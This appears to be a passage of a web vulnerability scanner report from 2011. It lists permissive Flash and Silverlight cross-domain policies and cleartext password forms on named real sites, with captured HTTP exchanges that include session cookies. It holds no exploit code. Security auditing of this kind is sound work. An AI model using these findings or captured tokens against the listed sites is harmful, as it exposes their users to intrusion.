GET /crossdomain.xml HTTP/1.1
Host: ak2.ostkcdn.com
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1787227/3-inBannerVideo2011_ViPrPf_New.swf?clickTag=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3aa3%2F3%2F0%2F%252a%2Ff%253B234670317%253B0-0%253B0%253B58524542%253B4307-300%2F250%253B40113270%2F40131057%2F2%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Efdr%253D234572024%253B0-0%253B0%253B32934908%253B4307-300%2F250%253B40173662%2F40191449%2F1%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Esscs%253D%253f&xmlFile=InBannerVideo_ViPrPf_LongboardVA_ronQ1.xml&taxonomyId=2&taxonomyType=sto&productCID=654321&keywords=&skus=12370379|12958970|11254000|12370390|10927901|11915556|13002490|10738953|12970899|12532546|12130097|12753446|11551645|066987|11144650|10355113|13197342|12941235|12370383|12978335|12453900
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 16 Dec 2010 06:09:38 GMT
Accept-Ranges: bytes
ntCoent-Length: 230
Content-Type: text/x-cross-domain-policy
X-Pad: avoid browser bug
Cache-Control: private
Date: Thu, 03 Feb 2011 22:00:42 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 230

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-content-type"/>
<allow-access-from domain="*.overstock.com"/>
<allow-access-from domain="*.ostkcdn.com"/>
...[SNIP]...

4.19. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 03 Feb 2011 19:10:29 GMT
Expires: Fri, 04 Feb 2011 19:10:29 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 357

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.20. http://www.apple.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.11 (Unix)
X-N: S
X-Cache-TTL: 600
X-Cached-Time: Wed, 22 Dec 2010 18:51:54 GMT
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=158
Expires: Thu, 03 Feb 2011 17:50:08 GMT
Date: Thu, 03 Feb 2011 17:47:30 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

5. Silverlight cross-domain policy  previous  next
There are 2 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://dev.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Mon, 13 Dec 2010 18:38:09 GMT
Accept-Ranges: bytes
ETag: "a92e8be3f49acb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 04 Feb 2011 01:49:40 GMT
Connection: close
Content-Length: 374

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
...[SNIP]...

5.2. http://superpages.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://superpages.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: superpages.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:17:34 GMT
Server: Omniture DC/2.0.0
xserver: www334
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6. Cleartext submission of password  previous  next
There are 87 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://advertise.tucows.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: advertise.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:27 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=6299093c20d21df56a507e2d4f08aada; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 6299093c20d21df56a507e2d4f08aada=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.2. http://advertise.tucows.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET / HTTP/1.1
Host: advertise.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:27 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=6299093c20d21df56a507e2d4f08aada; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 6299093c20d21df56a507e2d4f08aada=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.3. http://boardreader.com/my.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /my.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /my.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>            
                                           <form name="mylogin_" action="/my/subscription.html" method="POST">
               <table cellpadding="0" cellspacing="0" border="0" align="center" >
...[SNIP]...
<td align="left">
                           <input class="yacc_input_text" style="margin-top:5px;width:100px;" type="password" id="pass" name="pass" value="" />
                       </td>
...[SNIP]...

6.4. http://digg.com/submit  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:35:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1168415921484595456%3A180; expires=Fri, 04-Feb-2011 19:35:44 GMT; path=/; domain=digg.com
Set-Cookie: d=0ff09a9ff26d23c27385462bc99e308f35991a0289651f6a22602a6a428198db; expires=Wed, 03-Feb-2021 05:43:24 GMT; path=/; domain=.digg.com
X-Digg-Time: D=21532 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

6.5. http://forums.digitalpoint.com/showthread.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.digitalpoint.com
Path:   /showthread.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /showthread.php?t\\x3d1355583\\x22 HTTP/1.1
Host: forums.digitalpoint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:20 GMT
Server: Apache
Set-Cookie: bb_lastvisit=1296765140; expires=Fri, 03-Feb-2012 20:32:20 GMT; path=/; domain=.digitalpoint.com
Set-Cookie: bb_lastactivity=0; expires=Fri, 03-Feb-2012 20:32:20 GMT; path=/; domain=.digitalpoint.com
Set-Cookie: dyk=1; expires=Thu, 10-Feb-2011 20:32:20 GMT; path=/; domain=.digitalpoint.com
Cache-Control: private
Pragma: private
Content-Length: 24249
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<form id="navbar_loginform" action="login.php?s=60ff27681771626f1d2c139114155359&amp;do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" name="vb_login_username" id="navbar_username" size="10" accesskey="u" tabindex="101" value="User Name" />
<input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
<input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
...[SNIP]...

6.6. http://www.butterscotch.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9cd00a7bedd9d1a8c93d852d79adbcb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9cd00a7bedd9d1a8c93d852d79adbcb6=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<div class="signuppanel" id="signuppanel_login">
<form id="login" name="login" class="rwoform01" >
<div>
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...

6.7. http://www.butterscotch.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9cd00a7bedd9d1a8c93d852d79adbcb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9cd00a7bedd9d1a8c93d852d79adbcb6=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
</script>
<form id="signup" name="signup" action="/signup.html" class="rwoform01" >
<input type=hidden name=ref value="http://www.butterscotch.com/" />
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...
</label>
<input class="field" type="password" name="password2" value="" style="width: 270px;" />
</div>
...[SNIP]...

6.8. http://www.butterscotch.com/tutorials.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /tutorials.html HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f3e97b05b6880b7e05533d94dab21a4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f3e97b05b6880b7e05533d94dab21a4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<div class="signuppanel" id="signuppanel_login">
<form id="login" name="login" class="rwoform01" >
<div>
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...

6.9. http://www.butterscotch.com/tutorials.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /tutorials.html HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f3e97b05b6880b7e05533d94dab21a4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f3e97b05b6880b7e05533d94dab21a4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
</script>
<form id="signup" name="signup" action="/signup.html" class="rwoform01" >
<input type=hidden name=ref value="http://www.butterscotch.com/tutorials.html" />
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...
</label>
<input class="field" type="password" name="password2" value="" style="width: 270px;" />
</div>
...[SNIP]...

6.10. http://www.ericmmartin.com/projects/simplemodal/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ericmmartin.com
Path:   /projects/simplemodal/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /projects/simplemodal/ HTTP/1.1
Host: www.ericmmartin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 20:01:19 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34911


<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>SimpleModal / Eric Martin / ericmmartin.com</title>

<meta name="author" content="Eric Ma
...[SNIP]...
<div id="simplemodal-login-form" style="display:none">
   <form name="loginform" id="loginform" action="http://www.ericmmartin.com/wordpress/wp-login.php" method="post">
       <div class="title">
...[SNIP]...
<br />
           <input type="password" name="pwd" class="user_pass input" value="" size="20" tabindex="20" /></label>
...[SNIP]...

6.11. http://www.facebook.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=Al9E9; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:20 GMT
Content-Length: 30803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
